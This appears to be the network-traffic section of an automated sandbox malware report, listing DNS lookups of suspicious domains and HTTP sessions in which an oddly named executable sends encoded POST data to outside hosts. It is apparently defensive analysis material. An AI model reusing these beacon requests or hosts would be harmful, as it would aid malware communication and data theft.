Jan 11, 2025 05:40:12.511085033 CET | 80 | 53767 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:12.511208057 CET | 53767 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:12.531280041 CET | 53767 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:12.536272049 CET | 80 | 53767 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:13.477724075 CET | 80 | 53767 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:13.477746010 CET | 80 | 53767 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:13.477792978 CET | 80 | 53767 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:13.477807045 CET | 80 | 53767 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:13.477921963 CET | 53767 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:13.478049040 CET | 53767 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:13.478127003 CET | 80 | 53767 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:13.478281975 CET | 80 | 53767 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:13.478296041 CET | 80 | 53767 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:13.478363991 CET | 53767 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:13.478449106 CET | 80 | 53767 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:13.478460073 CET | 80 | 53767 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:13.478527069 CET | 53767 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:13.478611946 CET | 80 | 53767 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:13.478677034 CET | 53767 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:14.039382935 CET | 53767 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:15.057683945 CET | 53768 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:15.062650919 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:15.062851906 CET | 53768 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:15.077296972 CET | 53768 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:15.082197905 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:16.043466091 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:16.043493032 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:16.043504953 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:16.043515921 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:16.043523073 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:16.043531895 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:16.043544054 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:16.043617964 CET | 53768 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:16.043617964 CET | 53768 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:16.043694973 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:16.043708086 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:16.043720007 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:16.043750048 CET | 53768 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:16.043777943 CET | 53768 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:16.043884993 CET | 80 | 53768 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:16.043939114 CET | 53768 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:16.586111069 CET | 53768 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:17.606651068 CET | 53769 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:17.611475945 CET | 80 | 53769 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:17.611567974 CET | 53769 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:17.632543087 CET | 53769 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:17.637367010 CET | 80 | 53769 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:17.637535095 CET | 80 | 53769 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:18.583956957 CET | 80 | 53769 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:18.584067106 CET | 80 | 53769 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:18.584076881 CET | 80 | 53769 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:18.584119081 CET | 53769 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:18.584254026 CET | 80 | 53769 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:18.584264040 CET | 80 | 53769 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:18.584295034 CET | 53769 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:18.584350109 CET | 80 | 53769 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:18.584384918 CET | 53769 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:18.584434986 CET | 80 | 53769 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:18.584446907 CET | 80 | 53769 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:18.584479094 CET | 53769 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:18.584536076 CET | 80 | 53769 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:18.584572077 CET | 53769 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:19.148540974 CET | 53769 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:20.170039892 CET | 53770 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:20.174942970 CET | 80 | 53770 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:20.175112009 CET | 53770 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:20.186403036 CET | 53770 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:20.191246986 CET | 80 | 53770 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:21.142358065 CET | 80 | 53770 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:21.142373085 CET | 80 | 53770 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:21.142400980 CET | 80 | 53770 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:21.142509937 CET | 80 | 53770 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:21.142522097 CET | 80 | 53770 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:21.142541885 CET | 53770 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:21.142597914 CET | 80 | 53770 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:21.142606974 CET | 53770 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:21.142643929 CET | 53770 | 80 | 192.168.2.6 | 13.228.81.39
Jan 11, 2025 05:40:21.142707109 CET | 80 | 53770 | 13.228.81.39 | 192.168.2.6
Jan 11, 2025 05:40:21.142770052 CET | 80 | 53770 | 13.228.81.39 | 192.168.2.6
                                                            Jan 11, 2025 05:40:21.142781019 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142791986 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142808914 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.142829895 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.147396088 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.147434950 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.147478104 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.392695904 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.392733097 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.392744064 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.392855883 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.392867088 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.392879963 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.392954111 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.392999887 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.393009901 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393022060 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393052101 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.393594980 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393608093 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393620968 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393666029 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.393728018 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393747091 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393764973 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.394392967 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.394404888 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.394418001 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.394432068 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.394459963 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.437772036 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.442673922 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:34.556130886 CET5377180192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:34.561044931 CET8053771209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:34.561115980 CET5377180192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:34.576555014 CET5377180192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:34.582231998 CET8053771209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:35.161891937 CET8053771209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:35.162178993 CET8053771209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:35.162237883 CET5377180192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:36.086200953 CET5377180192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:37.104840994 CET5377280192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:37.110614061 CET8053772209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:37.110702038 CET5377280192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:37.130539894 CET5377280192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:37.135334015 CET8053772209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:37.703903913 CET8053772209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:37.703991890 CET8053772209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:37.704071045 CET5377280192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:38.632863998 CET5377280192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:39.651581049 CET5377480192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:39.656531096 CET8053774209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:39.657300949 CET5377480192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:39.671791077 CET5377480192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:39.676717997 CET8053774209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:39.676733017 CET8053774209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:40.244244099 CET8053774209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:40.244265079 CET8053774209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:40.244395018 CET5377480192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:41.179661989 CET5377480192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:42.359538078 CET5377580192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:42.364435911 CET8053775209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:42.364538908 CET5377580192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:42.379537106 CET5377580192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:42.384433985 CET8053775209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:42.944967031 CET8053775209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:42.945218086 CET8053775209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:42.945271015 CET5377580192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:42.948898077 CET5377580192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:42.953769922 CET8053775209.74.79.40192.168.2.6
                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                            Jan 11, 2025 05:39:47.379456997 CET | 192.168.2.6 | 1.1.1.1 | 0xcdf | Standard query (0) | www.l54354.xyz | A (IP address) | IN (0x0001) | false
                                                            Jan 11, 2025 05:40:03.515642881 CET | 192.168.2.6 | 1.1.1.1 | 0x4734 | Standard query (0) | www.valdevez.net | A (IP address) | IN (0x0001) | false
                                                            Jan 11, 2025 05:40:11.794701099 CET | 192.168.2.6 | 1.1.1.1 | 0xb6ab | Standard query (0) | www.sharefree88k24.click | A (IP address) | IN (0x0001) | false
                                                            Jan 11, 2025 05:40:26.448817015 CET | 192.168.2.6 | 1.1.1.1 | 0x1bb1 | Standard query (0) | www.tizzles.tech | A (IP address) | IN (0x0001) | false
                                                            Jan 11, 2025 05:40:34.542716980 CET | 192.168.2.6 | 1.1.1.1 | 0xfb8 | Standard query (0) | www.shopphere.store | A (IP address) | IN (0x0001) | false
                                                            Jan 11, 2025 05:40:49.433115005 CET | 192.168.2.6 | 1.1.1.1 | 0x15c7 | Standard query (0) | www.odvfr.info | A (IP address) | IN (0x0001) | false
                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                            Jan 11, 2025 05:39:47.860606909 CET | 1.1.1.1 | 192.168.2.6 | 0xcdf | No error (0) | www.l54354.xyz | | 162.218.30.235 | A (IP address) | IN (0x0001) | false
                                                            Jan 11, 2025 05:40:03.545890093 CET | 1.1.1.1 | 192.168.2.6 | 0x4734 | Name error (3) | www.valdevez.net | none | none | A (IP address) | IN (0x0001) | false
                                                            Jan 11, 2025 05:40:12.503252983 CET | 1.1.1.1 | 192.168.2.6 | 0xb6ab | No error (0) | www.sharefree88k24.click | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Jan 11, 2025 05:40:12.503252983 CET | 1.1.1.1 | 192.168.2.6 | 0xb6ab | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
                                                            Jan 11, 2025 05:40:12.503252983 CET | 1.1.1.1 | 192.168.2.6 | 0xb6ab | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
                                                            Jan 11, 2025 05:40:26.457721949 CET | 1.1.1.1 | 192.168.2.6 | 0x1bb1 | Name error (3) | www.tizzles.tech | none | none | A (IP address) | IN (0x0001) | false
                                                            Jan 11, 2025 05:40:34.553602934 CET | 1.1.1.1 | 192.168.2.6 | 0xfb8 | No error (0) | www.shopphere.store | | 209.74.79.40 | A (IP address) | IN (0x0001) | false
                                                            Jan 11, 2025 05:40:49.444139004 CET | 1.1.1.1 | 192.168.2.6 | 0x15c7 | No error (0) | www.odvfr.info | | 47.254.140.255 | A (IP address) | IN (0x0001) | false
                                                            • www.l54354.xyz
                                                            • www.sharefree88k24.click
                                                            • www.shopphere.store
                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.6 | 53765 | 162.218.30.235 | 80 | 3880 | C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:39:47.882653952 CET | 461 | OUT | GET /jq20/?pLNPctn=Y1tg4+SOL5eE+AycCXTvziB71yBrg1O91RsaYXN25C6htIJcZWWT4ijvmmdbSmKvee6IP68K4FvBkloeJ7ydTRz05iBunvLV+SpSL2s6yDyPdWIOZH0K/EFLjzJIDWXT1oCQnJs=&yL=ohjXjzZp0vl4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.l54354.xyz
                                                            Connection: close
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Jan 11, 2025 05:39:48.471570015 CET | 455 | IN | HTTP/1.1 302 Redirect
                                                            Content-Type: text/html; charset=UTF-8
                                                            Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=68383/jq20/
                                                            Server: Microsoft-IIS/10.0
                                                            Date: Sat, 11 Jan 2025 04:39:47 GMT
                                                            Connection: close
                                                            Content-Length: 200
                                                            Data Ascii: <head><title>文档已移动</title></head><body><h1>对象已移动</h1>可在<a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=68383/jq20/">此处</a>找到该文档</body>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.6 | 53767 | 13.228.81.39 | 80 | 3880 | C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:40:12.531280041 CET | 740 | OUT | POST /iz19/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Host: www.sharefree88k24.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 212
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.sharefree88k24.click
                                                            Referer: http://www.sharefree88k24.click/iz19/
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Data Ascii: pLNPctn=ZuElt0YrzCCikwJBYn0aP5wkTp69vgNSJSYerznSbAn+Ks4IlMsDtr0ATDxfe8WPvji3F0aLikBxgrOina7oxjdPQ7n3EtgQa2ac/xQe8ySiYuRLvV1IdXe442ShSpTf1SA2QrdpcNBxDofjGw+FEXdyI5chOc8tFFujJHqh5bcHoWeUt3aU90LG4PVO0TRz/f/lv9hKKeCJ
                                                            Jan 11, 2025 05:40:13.477724075 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sat, 11 Jan 2025 04:40:13 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                            Data Raw:
                                                            Data Ascii:
                                                            Jan 11, 2025 05:40:13.477746010 CET | 1236 | IN | Data Ascii: pupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2025-01-11 04:40:13.316799496 +0000 UTC m=+1197
                                                            Jan 11, 2025 05:40:13.477792978 CET | 1236 | IN | Data Ascii: t-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/iz19; Max-A
                                                            Jan 11, 2025 05:40:13.477807045 CET | 794 | IN | Data Ascii: kie: LADI_CAMP_PAGE_VIEW=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cook


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.6 | 53768 | 13.228.81.39 | 80 | 3880 | C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:40:15.077296972 CET | 764 | OUT | POST /iz19/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Host: www.sharefree88k24.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 236
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.sharefree88k24.click
                                                            Referer: http://www.sharefree88k24.click/iz19/
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Data Ascii: pLNPctn=ZuElt0YrzCCikQ5BLUMaYJwjfJ69lANeJSEeryjkayD+JJ8IkJYDqr0ALTxWQcWUvj+VFwaLikFxgpWinpjpwzcpFrn5KNgQa2ac/xE08yKiY9ZLu3NPT3e//2ShWpSW1SBRQp5DcPJxDsbjFh+CdHd0FZdoCJR3B2DaW0aOiMcUtgDOxEa3vkrE4NN80zRZ9fHl9qttFqnq6HMMFDJ8umKP0FpYuLDNRQ==
                                                            Jan 11, 2025 05:40:16.043466091 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sat, 11 Jan 2025 04:40:15 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                            Data Raw:
                                                            Data Ascii:
                                                            Jan 11, 2025 05:40:16.043493032 CET | 1236 | IN | Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f
                                                            Data Ascii: pupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2025-01-11 04:40:15.881554735 +0000 UTC m=+1197
                                                            Jan 11, 2025 05:40:16.043504953 CET | 1236 | IN | Data Raw: 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f
                                                            Data Ascii: t-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/iz19; Max-A
                                                            Jan 11, 2025 05:40:16.043515921 CET | 794 | IN | Data Raw: 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f
                                                            Data Ascii: kie: LADI_CAMP_PAGE_VIEW=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cook
                                                            Jan 11, 2025 05:40:16.043523073 CET | 1236 | IN | Data Raw: 36 33 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9c 57 51 6f db 36 10 fe 2b ac 86 2d 36 70 72 ec 34 f1 3a 29 ce 30 74 dd 6b 07 ac db b0 a7 80 12 29 89 35 45 2a 24 15 db 35 fc df 77 24 65 d7 76 92 22 68 12 5b e4 dd f1 78 c7 fb ee a3 72 fb e6 f7 8f ef
                                                            Data Ascii: 637WQo6+-6pr4:)0tk)5E*$5w$ev"h[xr?V;J"'2]\^<.lx^+gLHiU3k>;a=Ng{;E[H|`6eft=L(@zlq:mq/._F
                                                            Jan 11, 2025 05:40:16.043531895 CET | 224 | IN | Data Raw: 8b 34 83 cf 6d a7 07 f3 4a ac 11 44 e1 9d 22 a2 75 5f 47 3f c6 77 15 84 b3 e4 95 c3 c7 97 34 bc d7 79 cd f0 93 17 b4 5c 7a 98 28 96 99 ba a0 a3 29 f8 df c9 db f1 d3 1d c9 13 89 07 f8 36 6e 7c 3d 9d e2 11 b7 74 9d c6 39 c2 b6 1c f9 08 48 4a 6e 50
                                                            Data Ascii: 4mJD"u_G?w4y\z()6n|=t9HJnP5>D5C5ZFN7?W[}na3jn|w;4z_%if'1p5kzz3Xev90)xGbRO8c]R\MO8
                                                            Jan 11, 2025 05:40:16.043544054 CET | 1236 | IN | Data Raw: 5d f7 95 ca 82 a2 94 48 e3 d9 db 83 d0 b3 1f 5e f4 be 63 f7 04 99 9f 81 3e 0f bd 72 10 72 29 45 67 85 cd f7 7c 74 e4 ea d5 49 3d 95 96 52 5b 7e ca 71 5f 81 43 0b 84 1b be c2 0e f0 08 75 c1 7f 7e 9c 6e 63 ce fb db 81 04 bc 1c 6a 88 2a 72 b8 27 42
